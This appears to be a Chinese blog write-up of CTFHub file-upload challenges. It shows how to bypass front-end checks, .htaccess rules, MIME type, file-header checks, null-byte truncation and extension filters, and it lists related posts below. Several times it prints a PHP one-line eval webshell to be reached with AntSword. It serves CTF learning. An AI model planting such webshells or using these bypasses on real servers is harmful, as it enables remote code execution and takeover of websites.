ctfhub-前端验证,.htaccess,MIME绕过,文件头检查,00截断,双写后缀

最新推荐文章于 2024-07-15 20:56:51 发布
最新推荐文章于 2024-07-15 20:56:51 发布
阅读量1.5k 收藏 9
点赞数 3
CC 4.0 BY-SA版权
文章标签: 安全 web php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_55702959/article/details/122764501
本文详细探讨了文件上传过程中的多种安全验证绕过方法,包括前端验证、.htaccess配置、MIME类型绕过、文件头检查、00截断和双写后缀等。通过实例演示了如何利用这些技术进行文件上传,并展示了如何通过蚁剑等工具获取flag。同时强调了eval执行的危险性及其可能带来的安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

文件上传-前端验证

 文件上传-.htaccess

文件上传-MIME绕过

 文件上传-文件头检查

文件上传-00截断

文件上传-双写后缀

eval执行

文件上传-前端验证

上传文件时,客户端的javascript会对文件的类型进行一个校验,只允许 “.jpg” “.png” ".gif"的文件上传,于是关掉他

about:config

 一句木马

<?php @eval($_POST['123']); ?>

命名为1.php之后上传文件,用蚁剑打开他会发现flag

 

 文件上传-.htaccess

.htaccess是一个纯文本文件,存放着Apache服务器配置相关的指令。
       .htaccess主要的作用有:URL重写、自定义错误页面、MIME类型配置以及访问权限控制等。主要体现在伪静态的应用、图片防盗链、自定义404错误页面、阻止/允许特定IP/IP段、目录浏览与主页、禁止访问指定文件类型、文件密码保护等。
       .htaccess的用途范围主要针对当前目录。

https://www.cnblogs.com/engeng/articles/5948089.html

----------------------------------------------------------


AddType application/x-httpd-php .png//凡是png文件都当作php文件来解

以他为内容构建 .htaccess文件(特别注意这里文件名不可随意更改,因为 .htaccess 是配置文件)

<?php @eval($_POST["pass"]);?>

以他为内容命名为20.png

在题目页面先上传.htaccess,之后在上传20.png

 之后用蚁剑解开就可得到flag

文件上传-MIME绕过

MIME多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式.

----------------------------------------------------------

<?php @eval($_POST["pass"]);?>

以他为内容文件名为20.php

打开题目页面上传20.php并进行抓包

修改为image/jpg绕过验证,

放包,用蚁剑找flag

 

 文件上传-文件头检查

写一个图片马

https://blog.youkuaiyun.com/Ro_kin/article/details/75578711

之后将图片马命名为1.php,上传之后抓包(注意修改修改为image/png绕过检查)

 之后蚁剑来一遍flag就找到了

文件上传-00截断

00截断的原理,就是利用0x00是字符串的结束标识符,攻击者可以利用手动添加字符串标识符的方式来将后面的内容进行截断,而后面的内容又可以帮助我们绕过检测。 需要注意的是,0x00截断是16进制的截断,需要修改16进制的数据头,如果使用burp,就要在Hex中对数据进行改写。

-------------------------------------------------------------------

https://blog.youkuaiyun.com/Ro_kin/article/details/75578711

制作一个名为1.jpg的图片马上传抓包(注意红色字体后面加上1.php%00(1.php是我自己的文件名)


 

 放包用蚁剑找flag

 特别注意蚁剑连接

http://challenge-b810f810b52f1680.sandbox.ctfhub.com:10800/upload/1.php

文件上传-双写后缀

双写后缀绕过 用于只将文件后缀名,例如 "php" 字符串过滤的场合; 例如:上传时将Burpsuite截获的数据包中文件名【evil.php】改为【evil.pphphp】,那么过滤了第一个 "php" 字符串 "后,开头的'p'和结尾的'hp'就组合又形成了【php】。

---------------------------------------------------

写一句木马文件名为20.pphphp上传,会显示上传成功,之后用蚁剑找flag

eval执行

eval () 是一个危险的函数, 它使用与调用者相同的权限执行代码。 如果你用 eval () 运行的字符串代码被恶意方(不怀好意的人)修改,您最终可能会在您的网页/扩展程序的权限下,在用户计算机上运行恶意代码。

-----------------------------------------------------

查看根目录文件

 查看下一级目录,

 使用cat命令读取文件,找到flag

 

 

daphne31
关注
文件上传————ctfhubMIME绕过
qq_45655564的博客
05-29 851
什么是MIME MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。 它是一个互联网标准,扩展了电子邮件标准,使其能够支持: 非ASCII字符文本;非文本格式附件(二进制、声音、图像等);由多部分(multiple parts)组成的消息体;包含非ASCII字符的头信息
6、ctfhub技能树_web_文件上传
最新发布
YanLucyqi的博客
05-28 314
(5)打开终端,~/Desktop输入 chmod -R 777 AntSword-Loader-v4.0.3-linux-x64.zip和unzip AntSword-Loader-v4.0.3-linux-x64.zip,解压。(5)打开终端,~/Desktop输入 chmod -R 777 AntSword-Loader-v4.0.3-linux-x64.zip和unzip AntSword-Loader-v4.0.3-linux-x64.zip,解压。
CTFHub | 前端验证
尼泊罗河伯的博客
02-25 2227
前端验证是通过对客户端输入数据的合法性进行检查来确保数据是有效且安全的。通常,它会通过一系列简单的规则,如长度检查、格式检查、正则表达式匹配等,验证用户输入是否符合要求,以提高应用程序的安全性和可用性。
CTFHUB-技能树-Web-文件上传(前端验证MIME绕过00截断00截断-后缀
Static______的博客
04-16 3480
参考链接:http://www.admintony.com/%E5%85%B3%E4%BA%8E%E4%B8%8A%E4%BC%A0%E4%B8%AD%E7%9A%8400%E6%88%AA%E6%96%AD%E5%88%86%E6%9E%90.html。00截断简单来说,就是由于php解释器是由C语言编的,所以遵循C语言解析文件时遇到ascll码0时停止解析,而%00表示ascll码中的0,所以php解释器在解析文件时遇到%00就会默认文件名已经解析结束,所以我们可以利用这一原理进行上传。
CTFHUB-技能树-Web-文件上传(前端验证文件头检查
Static______的博客
04-17 1549
由此可见,只要是相同类型的文件,他的文件头就是一样的,这样代表了这个文件是属于什么类型,既然本题用到的是文件头检查,那我们制作一个图片马,将我们的一句话代码放入图片里面然后进行上传。我们先创造一个名为1.png的图片,然后一个名为1.php的一句话代码,把他们放到同一目录下,用cmd生成一个名为2.php的图片马。右侧开头%PNG就是这个文件的文件头,这也代表了这个文件是一个png文件,打开一个jpg文件。简单来说,就是每个文件的最开头部分,就是文件头,他代表了这个文件的是属于什么类型,例如。
ctfhub-MIME绕过
m0_62094846的博客
12-09 335
通过尝试php文件不能上传但是换成后缀jpg就可以上传成功,然后抓包,改包,尝试把后缀名改成php就可以 就可以蚁剑连接 注:MIME类型对应Content-Type 所以也可以上传php文件然后修改Content-Type ...
CTFHub |文件上传 (无验证前端验证.haccess绕过MIME绕过00截断后缀文件头检查
weixin_73688004的博客
03-09 1447
这里很奇特的一点:我尝试构造a.phpphp,上传后的文件是a. 也就是说,两个php都被替换为空了。猜测这个str_ireplace()函数应该是设置一个指针,遍历整个字符串,边遍历便查找,一经找到就删除,继续往后查找,而不是找到第一个就删除并返回。复制89504E47, 在文件开头>编辑>剪贴板数据>粘贴>ASCII Hex, 保存退出。这里有两个Content-Type字段,第一个用来限定文件显示范围的,第二个才是限定文件类型。第一种方法:按理来说应该也可以,上传也成功,但是出现不解的问题。
CTFHub-Web-文件上传
qq_54037445的博客
11-29 3415
htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过htaccess文件,可以帮我们实现:网页301重定向、自定义404错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能;前端验证,只能上传图片中列出的类型将文件名后缀含有的这些全部替换为空。
文件上传绕过pass-01到pass-16
bunengyongzho666的博客
07-15 1283
文件,简单来说就是在这个include.php文件中需要引用其他的应用程序,php中的应用程序是.php,也就是说它本来是想引用一个php文件,但漏洞就是,它不会识别什么是php文件,所以会将引用的文件当做php进行解析,我们就可以利用这个漏洞,将图片马做为它引用的文件,那么就可以解析图片马中的php代码了。因此我们可以通过上传图片马来达到上传php木马的目的。发包后,会将shell.jpg覆盖给shell.php通过%00进行截断,即为:shell.php%00shell.jpg变为shell.php
ctfhub技能树文件上传MIME绕过
04-01
好的,我需要解决用户在CTFHub文件上传中绕过MIME类型检查的问题。首先,用户提到了需要修改Content-Type和文件名,但上传PHP小马后网页无法解析,可能需要特殊编码或字符变换。根据引用[2],MIME绕过需要同时处理...
3.18号日报,ctfhubweb,文件上传漏洞题目解法
03-18
这种情况下可以利用00截断绕过文件名检查。 1. **分析允许上传的文件类型**:查看前端代码,找出允许上传的文件类型。 2. **上传文件**:在文件名末尾加上`.jpg`或其他允许的类型。 3. **抓包并修改文件名**:...
CTFHUB——文件上传之前端验证
wuuconix's blog
09-01 1137
网页源码 <body> <h1>CTFHub 文件上传 - js前端验证</h1> <form action="" method="post" enctype="multipart/form-data" onsubmit="return checkfilesuffix()"> <label for="file">Filename:</label> <input type="file"
CTFhub-文件上传-MIME绕过
ssss39的博客
08-31 923
抓包---> 修改 conten-type 类型 为 imge/jpeg。用哥斯拉生成 php 木马文件 1.php
CTFHub | Web——文件上传(前端验证
2301_76435948的博客
10-07 1162
在通过验证之后还未发出时,拦截HTTP请求,然后修改数据,使得JavaScript的验证不起作用。虽然将后缀名改回.php,里面的代码仍然存在,但是我想要的是图片形式的木马啊(Q_Q)cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。cmd 将该木马文件复制到任意图片中,利用文件包含漏洞解析图片木马。JavaScript属于前端验证,在浏览器未提交数据时进行验证。修改图片内容 在图片txt格式末尾加一句话木马。修改图片内容 在图片txt格式末尾加一句话木马。利用工具edjpgcom。
CTFHub 文件上传 - js前端验证
m0_52432374的博客
02-18 550
CTFHub 文件上传 - js前端验证 直接上传一句话木马yjh.php,发现结果返回很快(js前端验证标志) 解题方法: 看到js前端验证,想到 1.查看源代码发现允许jpg文件上传 2.先把一句话木马yjh.php改为yjh.php.jpg 3.打开代理,用bs抓包,得到 此时荧光部分改为yjh.php 4.再点击forward,显示文件上传成功,得到文件上传路径5.构造payload用蚁剑连接: http://challenge-5788ac737f2b5b31.sandbox.ctfhub.c
超级详细:CTFHUB文件头检查
qq_51250415的博客
05-16 2121
CTFHUB文件头检查 题目长这样: 这个题目考的是:png,gif等文件在文件的头部都会有其专有的字符,都确定这是什么类型的文件 比如用winhex打开,可以看到png专属的文件头信息。 这个题只能png的文件头,其他我尝试过不行。。。。 正式开始做! 首先:传文件!一定要传图片,网上随便找一张png格式的图片。然后截图尽可能小,几k就可以了。 然后burp suite抓包,抓到的东西。先删除不需要的东西,就是除了文件头以外的。 再用冰蝎自带的webshell中的代码。(一句话木马不得行!我尝试过了,
CTFHub-前端验证上传-wp
z1moq的博客
05-18 178
JS前端验证文件上传 使用一句话木马 <?php @eval($_POST['a']); ?> 并保存为.php文件 尝试上传 ​ 发现 .txt .php 文件都无法正常上传,只能上传 “.jpg" ".jpeg” “*.png” 文件。于是将 123.php 改为 123.jpg ,正常上传 由于JS验证属于前端验证,我们可以通过BurpSuite拦截请求并修改文件后缀 ​ forward放包 上传成功并回显相对路径 复制路径并访问,使用Hack
CTFHub技能书解题笔记-文件上传-MIME绕过
qq_43006864的博客
01-06 1891
打开题目 MIME绕过,先查查什么是MIME吧。 MIME:当文件的扩展名是用一种应用程序来打开的方式类型,当扩展名文件被访问的时候,浏览器会自动指定应用程序来打开。 有点绕口,通俗点就是, 当我们上传的文件被判定为content-type字段时,可以通过抓包,将content-type字段改为常见的图片类型,例如inamge/gif,从而绕过。 也就是我们上传php文件时,可以改为jpg、png之类的,然后实现绕过。 开始测试。 先正常测试下。发现确实不能上传 ..
CTFHub | .htaccess
尼泊罗河伯的博客
03-18 1939
htaccess 文件是 Apache 服务器中的一个配置文件,它负责相关目录下的网页配置。通过 htaccess 文件,可以帮我们实现:网页 301 重定向、自定义 404 错误页面、改变文件扩展名、允许/阻止特定的用户或者目录的访问、禁止目录列表、配置默认文档等功能。
文件上传MIME绕过
03-13
### 文件上传 MIME 类型绕过方法及安全性考虑 #### MIME 类型概述 MIME 多用途互联网邮件扩展类型,也称为 Media Type 或 Content-Type,在 HTTP 协议中用于定义文档的内容类型及其编码方式。最初设计目的是为了电子邮件系统的附件传输,后来广泛应用于 Web 浏览器与服务器之间的数据交换过程[^2]。 #### 绕过 MIME 类型检查的技术手段 ##### 利用不严格的 MIME 检查逻辑 部分应用程序仅依赖于客户端提交的 `Content-Type` 请求头来判断文件类型而未做进一步验证。攻击者可以通过修改此请求头中的值为合法的 MIME 类型(如 image/jpeg),即使实际上传的是 PHP 脚本或其他可执行代码文件,以此欺骗服务器接受非法文件[^1]。 ##### 使用混淆技术规避检测 对于某些实现了更严格 MIME 验证机制的服务端程序来说,简单的更改 `Content-Type` 可能不足以成功实施攻击。此时可以采用更为隐蔽的手法,例如改变文件的实际二进制签名或者利用不同操作系统下对同一文件格式的不同解释特性来进行伪装。此外,还可以尝试通过调整文件结构或添加无害的数据片段使文件既满足目标 MIME 类型的要求又隐藏了潜在威胁[^3]。 ##### 结合其他漏洞实现复合攻击 如果服务端不仅基于 MIME 进行初步筛选还会深入分析文件内部特征,则单纯依靠上述两种策略可能难以奏效。这时就需要探索是否存在其他的输入点能够辅助完成整个攻击链路的设计,比如结合 SQL 注入、XSS 等常见 web 安全问题形成组合拳式的进攻模式。值得注意的是,这种方式通常难度较大且风险较高,因为涉及到多个层面的安全防护措施突破[^4]。 #### 安全性建议 - **强化白名单校验**:只允许已知安全MIME 类型进入系统,并确保该列表尽可能详尽覆盖所有预期支持的媒体种类; - **多重身份认证**:除了 MIME 类型外还应增加额外的身份确认环节,如文件扩展名、魔数(Magic Number)、甚至是完整的文件解析库来做最终裁定; - **隔离沙箱环境运行未知来源文件**:任何来自外部世界的不可信资源都应在受控条件下被执行,防止其直接作用于生产环境中造成破坏; - **定期更新补丁并监控日志记录**:及时修补软件中存在的安全隐患,同时密切关注异常活动迹象以便快速响应突发事件。 ```python import mimetypes def check_mime_type(file_path, allowed_types): mime_guess = mimetypes.guess_type(file_path)[0] if not mime_guess or mime_guess.lower() not in allowed_types: raise ValueError(f"Invalid file type {mime_guess}") return True ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值